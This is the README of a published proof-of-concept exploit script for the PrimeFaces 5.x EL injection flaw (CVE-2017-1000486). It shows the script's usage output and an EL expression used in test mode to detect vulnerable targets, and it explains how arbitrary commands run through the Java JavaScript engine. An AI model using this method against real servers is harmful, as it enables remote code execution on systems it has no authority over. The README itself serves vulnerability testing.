Proof of Concept Exploit for PrimeFaces 5.x EL Injection (CVE-2017-1000486), a RCE vulnerability that can be used to gain Remote Code Execution on a target.
You can find an excellent description of the vulnerability on the Minded Security blog.
The exploit provides a help function that prints all important parameters
./primefaces.py --help
PrimeFaces 5.x EL injection exploit (CVE-2017-1000486) by MOGWAI LABS
=====================================================================
usage: primefaces.py [-h] [-t] [-e EXTENSION] url [payload]
PrimeFaces 5.x EL injection exploit
positional arguments:
url The target URL (http/https)
payload File with the JavaScript (Rino/Nashorn) code to
execute or OS command
optional arguments:
-h, --help show this help message and exit
-t, --test Test mode (off by default)
-e EXTENSION, --extension EXTENSION
Extension of the target (xhtml, jsf)
The exploit provides a simple test mode (-t parameter) that can be used to verify if a target is actually vulnerable. This works by sending the following EL-Expression to the target, which will add an additional header field to the HTTP response. The header is then checked by the exploit:
${facesContext.getExternalContext().setResponseHeader("MOGWAILABS","CHKCHK")}
Actual exploitation works by invoking the JavaScript interpreter that is bundeld with the Java VM. This allows to execute arbitrary Java Code from JavaScript.
The exploit provides two example payloads:
- payload.js (Execute a OS command)
- sleep.js (Sleep for 4 seconds, causing a delay of the response)
Please note that none of this examples will provide you with the output of the command.